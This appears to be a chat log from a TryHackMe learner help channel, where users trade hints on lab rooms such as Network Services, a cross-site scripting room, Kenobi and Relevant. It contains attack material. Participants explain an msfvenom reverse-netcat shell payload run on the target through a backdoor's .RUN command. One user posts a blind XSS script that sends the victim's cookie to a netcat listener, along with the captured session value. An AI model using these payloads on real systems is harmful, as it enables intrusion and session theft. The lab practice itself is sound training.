SF:\x20view\x20commands\n")%r(GetRequest,2E,"SKIDY'S\x20BACKDOOR.\x20Type
SF:\x20.HELP\x20to\x20view\x20commands\n")%r(HTTPOptions,2E,"SKIDY'S\x20B
SF:ACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20commands\n")%r(RTSPRequest
SF:,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20commands
SF:n")%r(RPCCheck,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20vie
SF:w\x20commands\n")%r(DNSVersionBindReq,2E,"SKIDY'S\x20BACKDOOR.\x20Type
SF:\x20.HELP\x20to\x20view\x20commands\n")%r(DNSStatusRequest,2E,"SKIDY'S
SF:\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20commands\n")%r(Help,2
SF:E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20commands\n"
SF:)%r(SSLSessionReq,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20
SF:view\x20commands\n")%r(TLSSessionReq,2E,"SKIDY'S\x20BACKDOOR.\x20Type
SF:x20.HELP\x20to\x20view\x20commands\n")%r(Kerberos,2E,"SKIDY'S\x20BACKD
SF:OOR.\x20Type\x20.HELP\x20to\x20view\x20commands\n")%r(SMBProgNeg,2E,"
SF:SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20commands\n")%r
SF:(X11Probe,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20
SF:commands\n")%r(FourOhFourRequest,2E,"SKIDY'S\x20BACKDOOR... etc ||
Sorry... not sure how to mark standard text as a spoiler..
use two pipes | around the spoiler message :)
Now I'm stuck with the msfvenom portion... any thoughts? I've got the tcpdump running ok... I can .RUN the ping... but the msfvenom part doesn't appear to react
Oh hey, thanks again.
Gave +1 Rep to @dry gate
msfvenom is a command used to create malicious code. Run it on your machine and it will give you the payload (malicious code). That's what you want the victim machine to run :)
so... run it local and not through the telnet? hmm
That room introduces a bunch of new things and I found it pretty confusing
exactly
I think I'm missing something here. I'm about to run out of time on the machine anyway - I'll come back to this in a while and see if my brain can recover enough functionality for a re-do.
under network services... I am trying to use ssh2john to convert the rsa key i got with get... it is saying id_rsa_scott has no password.
I just ran it through the local terminal with the only thing different being the lhost=[The local machine's ip]
I will cat id_rsa_scott
are there other requirements in the file. I just used sublime text
idk if thats what ur talking about but try ssh -i id_rsa [username]@[ip]
i havent cracked it yet
what task is it?
oh so does the msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R line open a port or something of that sort?
to receive the files or something?
have you checked the txt file what it said?
i havent cracked the password
you dont need to
because you have the private key
you can log in using private keys directly you still need the ip and username tho
ok but im still curious about cracking it
I feel like I should be able to if I have the private key
I'm pretty sure you can't because the "Company" in the context just gave the private key and probably only they know the password, idk if it's possible to crack or not but it's not the point of that module
however im not that experienced to really know in detail
hmm im not sure
@dry gate ^
It means that there's no passphrase, right? So there's nothing to crack. You can just use the rsa key to ssh in as the user without it prompting your for a passphrase.
It gives you a payload (malicious code) that will do that yeah. You get it to execute on the victim machine and it will send your machine a reverse shell on port 4444. Then on your machine, you listen on that port and BOOM you get a reverse shell
how do you execute the payload on the victim's machine tho?
And that's where I'm stuck, too. lol
lmao we're in the same boat, stuck on the same things since prob start of day
I think the idea is that once we open up the .RUN ping [local THM ip] -c 1, you can see the ICMP traffic over tcpdump. I thought that we should run msfvenom on the machine that we have the reverse shell on... but I must be missing something
well i already got to the part where we have the payload and i just need to see how to execute it
idk how tho and cant find it
i found the payload to be mkfifo /tmp/fbomtyz
so i figured i needed to do .RUN -p mkfifo /tmp/fbomtyz lhost=[the local ip i have] lport=4444 R
but i dont have anything on the listening port
Yeah, you're a step ahead of me... I must be missing what mkfifo is to begin with.
i just ran the msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R on the local machine
dont forget to change the [local tun0 ip] with the actual ip tho @tardy pumice
local ip that is
(I'm having to go back through it to get to that question again)
I can screenshot the answers I put on top if u want
I'm using this self abuse as training lol - but I was trying to do some things and forgetting.. meh - long day!
and i found how to do the end i was trying to do the command like they said so "msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R" but you actually just had to run the payload that it gave you from the output as a command
(for the last question)
Yeah, the .RUN? Man... I feel like I was there.. but where did mkfifo come into it?
wdym? where did it go?
I'm probably just reading something wrong
what question are you on rn?
I'm currently screwing up the login to telnet with 'telnet skidy@10.10.204.61 8012
palm-face
Thanks!
Gave +1 Rep to @upbeat badger
cause you cant know what his username is in advance
you only knew it after you got in
wait nvm
Well, it was in the "nmap -sV"
yeah i remembered
yeah but still thats all u need
I made a floppy Word doc with all the useful things I learnt for Linux from the start
I've been chicken-scratching it heh
OH That's where you got mkfifo, I was executing the msfvenom from the remote machine before.
Yeahhhhhhhhh.. it's a head-scratcher.
@tardy pumice i did manage to complete it so if ur stuck u can ask for help
I'm trying to run with the payload we found before, but I get nadda trying to run it after .RUN msfvenom -p.. like you showed above
Maybe a hint? lol
I was stuck at it too but I'll say that the payload outputted by you running msfvenom -p cmd/unix.... isn't a payload but rather a command with the payload inside
oh finally we get to learn a little bit of hydra
Yeahhh, am I close?
huh, it almost looks like that tmp/mxqtv was 'rm' and that the shell might be in the .. "/bin/sh"?
Eh not really, here I'll try to say it better: the output you got here is not only a payload, it's a command, a command which has the proper ip, port and payload to send something to you (when you are listening on port 4444)
idk if im just saying it in a not very clear way
Yeah, I have nc listening through "nc -lvp 4444"
yeah and that should be in a separate terminal
So far, so good... just can't figure out the command that will launch .RUN msfvenom yadda-yadda
Well crap. I need to run. Thanks though
want the answer before u go?
lol, sure, while you have it π
Need a littl help please!
I'm working on the cross-site scripting room: https://tryhackme.com/room/xssgi
I'm on the last questions of the last section, Task 8 - Practical Example - (Blind XSS)
In a terminal window I start a netcat listener:
nc -lvnp 4444
In the browser I enter the following into the body of the IT ticket, with a title of Test:
</textarea><script>fetch('http://10.6.108.24:4444?cookie=' + btoa(document.cookie) );</script>
Output from Netcat listener:
$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.6.108.24] from (UNKNOWN) [10.6.108.24] 40402
GET /?cookie=c2Vzc2lvbj0wZmQxMmRmYWYxMzU4MTI4YmU3MGI1M2M3OGFhZGIyZg== HTTP/1.1 <---- cookie
Host: 10.6.108.24:4444
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.124.19/customers/tickets/3
Origin: http://10.10.124.19
DNT: 1
Connection: keep-alive
The cookie above: cookie=c2Vzc2lvbj0wZmQxMmRmYWYxMzU4MTI4YmU3MGI1M2M3OGFhZGIyZg==
this is in base64 encoded, and here is my question. What part of the cookie is the cookie? Is it the entire string after 'cookie=' ? does it include the '==' ?
I've decoded everything between the = : c2Vzc2lvbj0wZmQxMmRmYWYxMzU4MTI4YmU3MGI1M2M3OGFhZGIyZg
session=0fd12dfaf1358128be70b53c78aadb2f
Then I tried: c2Vzc2lvbj0wZmQxMmRmYWYxMzU4MTI4YmU3MGI1M2M3OGFhZGIyZg==
session=0fd12dfaf1358128be70b53c78aadb2f
You can see the output for each is the same.
The last question asks:
What is the value of the staff-session cookie?
I entered "0fd12dfaf1358128be70b53c78aadb2f" (without quotes), but it said the answer was wrong. I also tried the entire
session=0fd12dfaf1358128be70b53c78aadb2f, but was given a wrong answer on that also. not sure what I'm missing here!
on rootme here is where im at.
there are the results of my gobuster
how do i know which one is hidden, as the question asks?
the answer is /panel but i only know that because it gives me the hint of how many letters the answer is
hidden might be the wrong way to phrase that question, but why cant the answer be uploads, etc... should i just know the other ones listed arent a directory?
i think "hidden" is just a bit of fluff in the room to point you to the next step - given that the hint text is /*****/ you should be able to work out which directory they're looking for
right.. gotcha.. just wanted to make sure there wasnt some tool or something i should have known
hello, I'm doing the Linux Fundamentals Part 3 and I am stuck on the automation section regarding the "cron" cmd. The last question is asking "when" the cmd occurs. Aside from the cmd that it gave me to demonstrate, I'm lost as to how to find a scheduled task. Can anyone help me?
what have you tried so far? do you know where cronjobs might be stored?
I've already inputted a couple of things and have gone to the https://crontab.guru/ site to verify what the only code I was given. I suspect that I should be able to view the processes which would give me the answer but I'm not even sure what to ask the googlez
am I looking for a way to find an automated process that already exists?
you just need to find how to look at the cronjobs on the system - have you looked at /etc/crontab? or crontab -l ?
no but yes. Crontab -l tells me all the processes. looking at /etc/crontab now
i just booted the box - i think you might already be looking at the answer. what is the question asking you?
Its asking "when will the crontab on the deployed instance (IP address) run?"
Im trying to paste the screenshot to show what I see
right, and you said you've already looked at crontab -l - what was in there?
it shows text like I would edit in crontab -e
but its non editable
"# Edit this file to introduce....blah blah."
yeah but what's the text? what is it telling you, why would you look at crontab -l?
if I scroll down I can see there was already a cmd there "@reboot /var /opt/process.sh"
thats what I'm trying to figure out.
it doesn't show any time, not even a " * * 2 * 3" like the demonstration shows
or rather "* 12 * * *"
no it doesn't, but it still has the same structure - some time thing, then a command
so if I was to break down the cmd thats there "@reboot"= reboot, "var/opt/process.sh"= the location of the processes being rebooted
is "@reboot" the key?
I'd assume that time would be there as the columns show the "m h dom dow command" but theres no time
try a google - crontab @ reboot
i know it's annoying to help like this but i don't want to spoil it for you, and you're 99.99999999999% there already
oh my god, first result explained it.
Thank you so much. I thought I was having a technical glitch
its just one of those "think about what it says, not what you think it says" things
I'm shaking my head right now. This is why I love and hate the technical stuff. Thank you so much
no worries at all
Through the telnet session with .RUN :)
I'm still working on that one (Network Services, Task 7) I can't figure out what I'm supposed to do to "inject the payload"...
running the msfvenom command on your machine gives you something that starts with "mkfifo", right?
Yuuup
that's the payload (malicious code)
it basically says "connect to that machine on that port and give them a shell"
You can execute commands on the target machine in that telnet session. It says that you can do that with .RUN <command>
so
.RUN mkfifo ....
Is the target machine executing that command. It says "I'm going to send that machine a shell on that port" (you specified the IP and port when making the payload with msfvenom)
But you need to open that port that they're sending that shell on
I have nc listening on 4444
The target machine sends it to port 4444 for example. If that port on your machine is closed then it won't work
ah
I've .RUN the entire string they give... I've tried to come up with variations.. not really making a difference and there's no feedback
Hrm, I've tried just straight copy/paste and I've tried typing out the entire string. Just kinda hangs there.
I'm assuming my payload is off.
hmmm
I mean, it's generating the payload... but then when I try to get the string to run on the remote it just hangs out.
Oh... wait... connection...? that's new. Is that it?!
ah yeah
oh frick, that was it...
SO CLOSE, HOW DO I OPEN?!?!!? maaaaaaaaaaan
So, I'm supposed to open the flag.txt.
yes
I did ls... and I can see it.
cat flag.txt no?
Tried more... less.. cat... then I started just throwing help commands out there
try ls -l
ls -l
is it to do with permissions
or can you just not use those commands?
The reverse terminal just appears to be sitting there now. hrm.
ah
yeah reverse shells are really flimsy
python -c 'import pty; pty.spawn("/bin/bash")'
I think that should stabilise it somewhat
yeah if your reverse shell has soiled itself, you can just set up the netcat listener again and execute the mkfifo payload in the telnet session
Dang. Well, that was as much time as I could spend this morning, gotta run.
Thanks! I appreciate it, I'll tackle it later
Gave +1 Rep to @dry gate
okok take care man :)
Ahhh - IC what ya did there ^^
Hi guys, I have a problem in the Kanobi room. When I use the command "mount machine_ip:/var /mnt/kenobiNFS" I get "mount.nfs: requested NFS version or transport protocol is not supported".
I've tried googling but I can't find any solutions. Can you help me?
kenobi*
yea I figured that out, I didn't know that you just had to copy paste the line
Did you create the kenobiNFS directory in the mnt folder first? If that's not the issue, try to install nfs-utils
hey guys. I've come across XML-RPC, and I'm wondering what should be the best alternative to Burp Collaborator so I can generate the payload
So I just finished the SSRF room but I want to understand why does using x/../ bypass the ip block when changing the avatar?
thx bro
Gave +1 Rep to @left thunder
Can someone give me a hint with wonderland, i'm on rabbit right now and i'm not sure where to go, i ran strings with the teaParty file and I know it has something to do with date but idk what to do from here
Can anyone help me for room #908828816393244742v4 any hint for privesc
Did you notice anything strange about how the date is called?
Have you checked out the room channel?
No
Not sure
That wasn't for you :p
How can i escalate priviledge
Sorry I haven't done that room yet, look in #908828816393244742, there may be some hints in there
Okk thanks
Gave +1 Rep to @ripe hedge
a binary
well, yes, but what else
think about exactly which binary will be called
iβll need to look when iβm at my pc again, just woke up
no worries
The answer is the name of this icon
I can't say more without spoiling the whole answer
alright thanks
anytime
It's better not to
alright
its tricky one, windows webpages got the answer
Upload Vulnerabilities Task 7, I run the following which should be listening to ANY but lists 0.0.0.0? I receive no read out when loading the page. nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Mine always shows 0.0.0.0 so I don't think it's the issue
sorry about that man, I figured it out and thought it's a silly question
But thank you!
Gave +1 Rep to @dry gate
tell us more so we can try to help
no worries man! I'm glad you figured it out :D
0.0.0.0 as an ip address means global.... i.e all ip addresses are being listened on for said port
On the Junior pentester pathway, Burp Suite: Intruder
Task 11
Configure an appropriate position and payload (the tickets are stored at values between 1 and 100), then start the attack.
You should find that at least five tickets will be returned with a status code of 200, indicating that they exist.
Why am I only getting status code 302 on all 100 numbers? I intercepted the request sent when clicking on a ticket, and changed the position to Referer: http://10.10.205.193/support/ticket/§numbers§
Did you capture a request while being logged in?
Yes, I even tried capturing a request to each of the three tickets.
Could you send a screen of the request you send to intruder?
I just shut down the pc for the night. Can I pm you tomorrow if it's still an issue?
Ye, but I guess it would be better if you just ask the question in here and include the screen, in order for someone else to be able to reply to it too. But you can just tag me in that channel message then if you want.
Maybe a silly question - When one of the rooms is asking you to 'perform a thorough scan' in nmap... is there any way to do it where it doesn't take 20m+?
you can use rustscan
https://github.com/RustScan/RustScan/wiki/Installation-Guide
essentially, you pull this program to run in a docker container. make an alias for the command, then use it as rustscan <targetIP>
- docker pull cmnatic/rustscan:debian-buster
- alias rustscan='docker run -it --rm --name rustscan cmnatic/rustscan:debian-buster rustscan'
takes 20minute scans to under a minute
Whoa! Yeah, it might take a bit to get a handle on the syntax, but thanks!
Gave +1 Rep to @glass eagle
it will do a portscan, then take those results and throw them into nmap. you can add nmap parameters as well. just checkout the github
Ok thanks! I've added to favorites.
I need a lil starting hint, I can't find a point of entry, I've tried EternalBlue and stuff and CVE-2018-0886, can't get a hit on either
Sometimes admins forget to set permissions or do they?
Yo, still stuck?
Yes
You found a share?
What ports are open on the machine?
port 80 open, http Microsoft IIS httpd 10.0
135 open Microsoft Windows RPC
139 open SMB Microsoft Windows netbios-ssn
445 open
3389 open
that maybe sounds like #room-help and not hint, though I might be wrong
Also what's on port 80, try visiting it using your browser
Let's move to #room-help
nononon
i dont want help
imma stick with this
one hint
ill be back
if i get stuck again
I want as little help as I can
tysm
whats that room, looks like fun
It's really not
https://tryhackme.com/room/relevant#
I'm kinda struggling on some easy ones, I will try later
Thank you, I thought as much. The guides I read showed "ANY", I must be doing something else wrong then.
Gave +1 Rep to @alpine kestrel
im back
Ive tried to use the creds i got on all the SMB shares and alongside some exploits but cant get a hit
update i forgot about rpc and trying now
Update 2 I tried rpc and every command i entered failed after getting login with a user
@earnest charm i need saving again
im taking another break
gonna go for a run
maybe
Did you do a dir bust on the Webserver?
Yeah I just got errors on errors numerous times
Even when I restarted
So I figured it was a dead end
Do a nmap scan again, looks like you missed a port
Sorry for the delay, I've tried scanning it so many times
keeps failing
and it takes ages each time
Hmmm weird. Okay run this nmap -p- --min-rate=5000 $IP
And post the output in #room-help
Hi all, just trying to correctly get the answer to Task 3's question in the Nmap Post Port Scans room. Question says to run nmap with -O against the target but nmap tells me there are no exact matches for the host. I've tried with and without -sS. Is there something I'm missing? Running with sudo.
Any hints for the tryhackmeroom CC:pen testing task 24??
where exactly are you stuck?
hello there again, i need hints on "Walking an application", task 3, questions 3 and 4
i have been searching for an hour
nothing referencing directory or framework
send screenshot of question please
let me just load up VM
@fickle elm for the framework flag, view page source + scroll down to bottom
look at the comment
alright
for the directory listing, look closely at the .js files listed and where they are stored
you legend